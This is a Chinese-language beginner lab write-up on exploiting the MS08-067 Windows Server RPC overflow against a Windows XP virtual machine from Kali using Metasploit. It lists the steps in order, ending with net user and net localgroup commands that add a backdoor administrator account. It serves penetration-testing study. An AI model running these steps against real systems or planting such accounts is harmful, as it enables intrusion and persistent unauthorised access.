學習滲透第一步就是進行主機滲透,這里不得不說滲透必備的操作系統:kali-Linux,趕快去下載一個虛擬機玩一下吧!然后在官網安裝好系統。最后進入到我們今天的整體,主機滲透!今天以最基礎的ms08-067漏洞為例。
一、實驗名稱:
MS08-067漏洞攻擊
二、實驗環境:
(實驗的系統配置、比如CPU、操作系統、攻擊機/靶機IP地址等參數)
VmwareWorkstation pro虛擬機、kali2019.4(攻擊機)、Windows xp(靶機)
Kali ip:192.168.73.131
Xp ip:192.168.73.129
三、實驗原理:
(實驗對應的原理和基礎知識描述)
該實驗利用的是Microsoft Windows Server服務RPC請求緩沖區溢出漏洞,該漏洞是指Windows的Server服務在處理特質RPC請求時存在緩沖區溢出漏洞。遠程攻擊者可以通過發送惡意的RPC請求觸發這個溢出,導致完全入侵用戶系統,SYSTEM權限執行任意指令。
四、實驗步驟:
(實驗操作的步驟、截圖以及文字描述)
我們首先打開虛擬機kali和xp系統,查看虛擬機網絡適配器並將它們兩個的網絡連接模式都調到NAT模式。
鼠標右擊kali系統桌面,點擊打開終端,輸入ifconfig查看kali系統ip地址為192.168.73.131
Windows鍵加r輸入cmd,進入命令提示符窗口,輸入ipconfig查看xp系統ip地址為192.168.73.129
使用kali系統ping一下xp系統,輸入ping192.168.73.129,同樣使用xp系統ping一下kali系統,輸入ping192.168.73.131
啟用msf,命令為msfconsole
搜索漏洞,命令為search ms08-067
加載攻擊模塊和配置信息
可以use選擇一個載荷后查看其使用的對象
命令:show targets
開始利用,並返回成功利用的信息
查看權限,輸入getuid
添加用戶賬號,命令為:net user hkb hkb /add
把剛剛創建好的用戶添加到管理員組,命令:net localgroup administrators hkb /add
輸入exit退出到meterpreter后即可進行滲透操作